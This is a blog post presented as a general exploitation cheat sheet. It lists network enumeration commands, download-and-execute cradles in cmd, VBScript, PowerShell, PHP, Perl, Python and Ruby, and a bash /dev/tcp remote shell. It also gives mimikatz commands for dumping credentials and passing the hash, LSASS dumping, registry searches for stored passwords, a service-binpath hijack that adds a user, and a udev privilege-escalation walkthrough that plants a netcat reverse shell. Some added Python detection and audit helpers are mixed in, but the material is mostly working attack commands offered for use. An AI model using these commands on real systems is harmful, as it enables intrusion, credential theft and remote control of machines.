Thursday, 3 November 2016

General Exploitation Scenario

This article is for educational purposes only; I am not responsible for any damage done by misusing this knowledge. It is what it is: security research. The article is not meant to be complete, but to create a scenario for security researchers. I have taken information from various resources, as you will see, and I have mentioned them; if I have missed something, please excuse me.

0. Enumeration

netdiscover -r <network>/24

nmap -sV -T4 -O -F --version-light <ip>
nmap -sC -sS -T4 -A -v -v -Pn <ip>
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 <ip>
dirb http://<ip>
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://<ip>/FUZZ
smbclient -N -L <ip>
enum4linux -a <ip>
nikto -h <ip>

1. Download a file:

bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe

bitsadmin /transfer wcb /priority high http://download.url/examplefile.pdf C:\downloads\examplefile.pdf
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://download.url c:\mess.exe&start mess.exe"

tftp -i <host> GET location_of_file_on_tftp_server C:%homepath%file

ftp <ip>
username
password
get file
exit

cmd.exe /c "@echo open>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send

with bStrm
    .type = 1 ' adTypeBinary
    .open
    .write xHttp.responseBody
    ' VBScript does not expand %homepath% on its own, so expand it through WScript.Shell
    .savetofile CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:%homepath%file"), 2 ' adSaveCreateOverWrite
end with

cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs &@echo objXMLHTTP.open "GET","http://download.url/messbox.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:$env:HOMEPATH\file")

powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
#!/usr/bin/php
<?php
    $data = @file("http://domain/file");   // file() returns the remote content as an array of lines
    $lf = "local_file";
    $fh = fopen($lf, 'w');
    fwrite($fh, implode('', $data));        // write every line, not only $data[0]
    fclose($fh);
?>

echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("domain") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}

Bash, using /dev/tcp (file descriptor 5 is the connection; each line read from it is executed and its output sent back):

exec 5<>/dev/tcp/<ip>/<port>
cat <&5 | while read line; do $line 2>&5 >&5; done
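From the defender's side, the cradles above leave distinctive command lines in process-creation telemetry. The following Python is an added example, not code from the original post: four rules derived from section 1, run over constructed sample records; the record format and the rule names are my own.

```python
import re

# Constructed sample process-creation records (image, command line); not real
# telemetry. Records 0-3 are modelled on the cradles in section 1, 4-5 are benign.
SAMPLE_EVENTS = [
    ("bitsadmin.exe", "bitsadmin /transfer myjob /download /priority high http://download.url c:\\mess.exe"),
    ("cmd.exe", 'cmd.exe /c "@echo open>script.txt&@echo binary>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"'),
    ("powershell.exe", "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://download.url/messbox.exe','mess.exe')"),
    ("cmd.exe", 'cmd.exe /c "@echo Set objXMLHTTP=CreateObject(^"MSXML2.XMLHTTP^")>poc.vbs&cscript.exe poc.vbs"'),
    ("bitsadmin.exe", "bitsadmin /list /allusers"),
    ("powershell.exe", "powershell Get-Process lsass"),
]

# (rule name, regex over the command line). Each rule mirrors one cradle above:
# bitsadmin /transfer with a URL, ftp driven by a -s: script file, WebClient
# DownloadFile, and cmd echoing a .vbs to disk.
RULES = [
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin\b.*\s/transfer\b.*\bhttps?://", re.I)),
    ("ftp_script_file", re.compile(r"\bftp(\.exe)?\s[^&|]*-s:\S+", re.I)),
    ("powershell_webclient", re.compile(r"System\.Net\.WebClient\b.*\.DownloadFile\(", re.I)),
    ("cmd_writes_vbs", re.compile(r"@echo\b.*>\s*\S+\.vbs\b", re.I)),
]

def match_event(cmdline):
    """Return the names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Map the index of each suspicious record to its matched rule names."""
    hits = {}
    for idx, (_image, cmdline) in enumerate(events):
        names = match_event(cmdline)
        if names:
            hits[idx] = names
    return hits

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][0], names)
```

Benign administrative use of the same binaries (records 4 and 5) does not match, which is the property to keep when tuning these against real logs.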


2. Get a limited shell:

h4x# ./ --url='http://localhost/test/cmd.php?=<rce>'
shell> id 
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.

For example:
h4x# ./ --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)




2.1 Direct Exploitation (Windows):

Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026):

Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039):

Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039):

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049):

Microsoft Windows - ASN.1 Remote Exploit (MS04-007):

Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011):

Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011):

Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031):

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)

Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039):

Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040):

Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2):

Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070):

Microsoft Windows Server - Code Execution (MS08-067):

Microsoft Windows Server 2000/2003 - Code Execution (MS08-067):

Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050):

Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)

2.2. Direct Exploitation (Linux):

Read the Kioptrix series carefully; there are very nice examples.

2.3. Directory traversals:

3.1 Attempt hashdump (Windows)

Mimikatz Commands:

logonpasswords: mimikatz # sekurlsa::logonpasswords

Extracts passwords in memory

pth (pass the hash):

mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the fake identity's NTLM hash is replaced with the real one.
“ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
“AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”

ptt (pass the ticket):

mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
tickets:  mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them.
sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
ekeys:  mimikatz # sekurlsa::ekeys
Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user).
dpapi:  mimikatz # sekurlsa::dpapi
Lists the DPAPI master keys cached in LSASS for logged-on users.


mimikatz # sekurlsa::minidump lsass.dmp
Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).
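The version caveat above can be checked before a dump ever leaves the box. This Python is an added example (not mimikatz code and not from the original post): it reads the MINIDUMP_HEADER, walks the stream directory to the SystemInfo stream and returns the Windows version recorded there; the sample dump is constructed inside the block. I compare major.minor rather than the major number alone, since Server 2008 (6.0) and Server 2012 (6.2) share major version 6.

```python
import struct

MDMP_SIGNATURE = 0x504D444D   # "MDMP" read as a little-endian u32
SYSTEM_INFO_STREAM = 7        # MINIDUMP_STREAM_TYPE SystemInfoStream
PRODUCT_TYPES = {1: "workstation", 2: "domain controller", 3: "server"}

def read_minidump_os_version(data):
    """Return (major, minor, build, product) from the dump's MINIDUMP_SYSTEM_INFO."""
    # MINIDUMP_HEADER starts: Signature, Version, NumberOfStreams, StreamDirectoryRva
    sig, _version, nstreams, dir_rva = struct.unpack_from("<IIII", data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("not a minidump: bad signature")
    for i in range(nstreams):
        # MINIDUMP_DIRECTORY entry: StreamType, DataSize, Rva (12 bytes each)
        stype, _size, rva = struct.unpack_from("<III", data, dir_rva + 12 * i)
        if stype != SYSTEM_INFO_STREAM:
            continue
        # MINIDUMP_SYSTEM_INFO prefix: ProcessorArchitecture(u16), ProcessorLevel(u16),
        # ProcessorRevision(u16), NumberOfProcessors(u8), ProductType(u8),
        # MajorVersion(u32), MinorVersion(u32), BuildNumber(u32)
        _arch, _lvl, _rev, _ncpu, product, major, minor, build = struct.unpack_from("<HHHBBIII", data, rva)
        return major, minor, build, PRODUCT_TYPES.get(product, "unknown")
    raise ValueError("minidump has no SystemInfo stream")

def same_windows_version(dump_ver, host_ver):
    """True when the dump and the analysis host report the same major.minor."""
    return dump_ver[:2] == host_ver[:2]

def build_sample_minidump(major, minor, build, product=3):
    """Constructed minimal minidump for testing: header, one directory entry, SystemInfo."""
    # Version 0xA793 is MINIDUMP_VERSION; directory at offset 32, SystemInfo at 44
    header = struct.pack("<IIIIIIQ", MDMP_SIGNATURE, 0xA793, 1, 32, 0, 0, 0)
    sysinfo = struct.pack("<HHHBBIIIIIHH", 9, 6, 0, 4, product, major, minor, build, 2, 0, 0, 0)
    sysinfo += b"\0" * 24  # Cpu union, unused here
    directory = struct.pack("<III", SYSTEM_INFO_STREAM, len(sysinfo), 32 + 12)
    return header + directory + sysinfo

if __name__ == "__main__":
    dump = build_sample_minidump(6, 2, 9200)   # Windows Server 2012 numbers
    print(read_minidump_os_version(dump))
```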


mimikatz # sekurlsa::kerberos
Extracts the smartcard/PIV PIN from memory (cached in LSASS when using a smartcard).


mimikatz # privilege::debug
Sets debug mode for current mimikatz session enabling LSASS access.
lsadump cache: (requires token::elevate to be SYSTEM)
mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible as SYSTEM).

Download procdump

Dump the memory of the lsass.exe process to lsass.dmp:

procdump -accepteula -ma lsass.exe lsass.dmp

Download mimikatz from

Run mimikatz

Use debug mode:

privilege::debug

Switch to minidump mode:

sekurlsa::minidump lsass.dmp

List all logons; you will now see the passwords:

sekurlsa::logonpasswords


If you don't dump the memory, use this method instead:

Run mimikatz
Inject sekurlsa.dll into lsass.exe:
inject::process lsass.exe sekurlsa.dll

List all passwords:

4.1 Escalate (Windows):

Try 1:
sysret -pid <explorer pid>

Try 2:

Process Injector:

Try 3:


Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ):

Try 4:

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
Exploit-DB 16262 (windows/dos): "MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC", 2011-03-01, Nikita Tarakanov

Service Tracing Key (MS10-059)

Ryujin - ADF.sys priv esc - ms11-080
pyinstaller -
py2exe -

UAC Bypass priv esc

Try 5: 

Unattend credentials are stored in base64 (the password as UTF-16LE text, with the literal suffix "Password" appended before encoding) and can be decoded manually with base64; the value must be piped in, since base64 -d treats an argument as a file name:
user@host $ echo cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA= | base64 -d | iconv -f UTF-16LE -t UTF-8
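To audit leftover answer files in bulk rather than decode one value by hand, here is an added Python example (not from the original post): it parses a constructed unattend.xml fragment, decodes every password value from base64/UTF-16LE and strips the "Password" (or "AdministratorPassword") suffix Windows appends before encoding; the element names and namespace are the real unattend schema, the sample contents are mine.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed unattend.xml fragment (not from a real host). Windows stores the
# value as base64 over UTF-16LE text with the element's own name appended as a suffix.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

NS = "{urn:schemas-microsoft-com:unattend}"
PASSWORD_TAGS = ("Password", "AdministratorPassword")

def decode_unattend_value(value, suffix="Password"):
    """base64 -> UTF-16LE text, then drop the suffix Windows appended before encoding."""
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len(suffix)] if text.endswith(suffix) else text

def find_passwords(xml_text):
    """Return [(tag, account name, password)] for every encoded or plaintext password element."""
    root = ET.fromstring(xml_text)
    parent = {child: node for node in root.iter() for child in node}
    found = []
    for node in root.iter():
        tag = node.tag[len(NS):] if node.tag.startswith(NS) else node.tag
        if tag not in PASSWORD_TAGS:
            continue
        value = node.find(NS + "Value")
        if value is None or not value.text:
            continue
        plain = node.find(NS + "PlainText")
        is_plain = plain is not None and (plain.text or "").strip().lower() == "true"
        password = value.text.strip() if is_plain else decode_unattend_value(value.text.strip(), tag)
        owner = parent.get(node)            # AutoLogon or LocalAccount holds the account name
        name_node = None
        if owner is not None:
            name_node = owner.find(NS + "Username")
            if name_node is None:           # LocalAccount uses <Name> instead of <Username>
                name_node = owner.find(NS + "Name")
        found.append((tag, name_node.text if name_node is not None else None, password))
    return found
```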

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini

Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
Dumping cleartext credentials with mimikatz

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin: 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

SNMP Parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

Putty clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe)  to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]

reg query HKCU /f password /t REG_SZ /s [ |clip]

Change the upnp service binary

sc qc upnphost
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost

Sysinternals tools
Check processes and start-up applications with Autoruns and procmon -

Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?

sysinternals tools
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
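A defender-side check for the "services pointing to writeable locations" item, as an added Python example (not from the original post): it parses the layout `sc qc` prints (the sample output below is constructed, not captured from a host), pulls the executable out of BINARY_PATH_NAME and reports when the binary or its directory is writable by the current user, or the service runs as LocalSystem. On Windows feed it real `sc qc <service>` output; elsewhere only the parsing is exercised.

```python
import os
import re

# Constructed `sc qc` output in the layout the command prints (not captured from a host).
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : UPnP Device Host
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

def parse_sc_qc(text):
    """Return the KEY : VALUE fields of one sc qc listing as a dict (SERVICE_NAME included)."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg

def executable_from_binpath(binpath):
    """Executable part of BINARY_PATH_NAME: a quoted path, else everything before the first space."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        return binpath[1:binpath.index('"', 1)]
    return binpath.split(" ", 1)[0]

def weak_points(cfg):
    """Findings worth acting on: writable binary or binary directory, and a LocalSystem account."""
    exe = executable_from_binpath(cfg.get("BINARY_PATH_NAME", ""))
    findings = []
    if exe and os.access(exe, os.W_OK):
        findings.append("service binary is writable by the current user: " + exe)
    exe_dir = os.path.dirname(exe)
    if exe_dir and os.access(exe_dir, os.W_OK):
        findings.append("service binary directory is writable by the current user: " + exe_dir)
    if cfg.get("SERVICE_START_NAME", "").lower() in ("localsystem", r".\localsystem"):
        findings.append("service runs as LocalSystem: a replaceable binary here yields SYSTEM")
    return findings

if __name__ == "__main__":
    cfg = parse_sc_qc(SAMPLE_SC_QC)
    print(cfg["SERVICE_NAME"], executable_from_binpath(cfg["BINARY_PATH_NAME"]), weak_points(cfg))
```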



4.2 Escalate Linux:

find / -user root -perm -4000 -ls 2>/dev/null

Read this carefully:

Exploit for distcc to escalate the privilege from user daemon to root.
wget --no-check-certificate -O exploit-8572.c
ls -l exploit-8572.c
gcc exploit-8572.c -o exploit-8572
ls -l exploit-8572*
echo '#!/bin/sh' > /tmp/run
echo '/bin/netcat -e /bin/sh <our ip> 4444' >> /tmp/run
ps -eaf | grep udev | grep -v grep

[1] Record the udevd PID (2709), [2] subtract 1 (2708), and [3] supply the new PID to the next step.

./exploit-8572 2708

Other exploits: